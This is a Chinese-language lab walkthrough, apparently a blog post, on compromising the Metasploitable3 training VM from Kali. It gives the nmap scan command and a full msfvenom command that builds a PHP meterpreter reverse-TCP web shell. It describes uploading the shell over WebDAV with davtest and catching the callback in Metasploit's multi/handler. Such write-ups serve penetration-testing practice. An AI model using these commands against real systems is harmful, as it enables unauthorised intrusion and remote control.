本文记录利用nmap进行信息收集,msfvenom创建木马文件、结合Metasploit framework的exploit/multi/handler模块实现攻击metasploitable3的实验过程
01 测试环境
1.1 目标机器
Windows server 2008 R2 metasploitable3
1.2 攻击机
kali 2020.2a
02 信息收集
nmap端口扫描
nmap -p- -sS -sV -v -n –open -oX /home/kali/test/nmap_2k8.xml 192.168.248.103
参数解释:
1 | -p- 所有端口 |
03 确定攻击目标
以8585端口上部署的PHP/5.3.10环境的DVA/2作为目标
通过浏览器访问目标地址,选择upload位置作为攻击点
04 执行攻击
4.1 创建木马文件
使用msfvenom创建木马文件,使用php/meterpreter_reverse_tcp作为攻击payload,目标文件为:/home/kali/test/test_0912.php
1 | sudo msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.248.102 LPORT=6666 -f raw >/home/kali/test/test_0912.php |
4.2 上传木马文件
使用davtest上传文件,将目标地址作为参数来使用
查看davtest的使用参数,本次仅用到-url(指定攻击路径)、-uploadfile(指定待上传文件)、-uploadloc(指定目标路径)
创建目录,检测可以执行的文件路径
上传到指定路径
文件成功上传
4.3 监听端口,触发木马文件
打开Metasploit Framework,使用exploit/multi/handler模块监听目标端口,等待回连
上传到目标机器上的木马文件中配置的ip地址是kali的本机地址,所以kali机器设置监听本机地址的6666端口即可
点击访问上传的木马文件:666666.php
获得shell,攻击成功
使用ls查看当前路径下的文件
使用pwd查看当前路径
The end!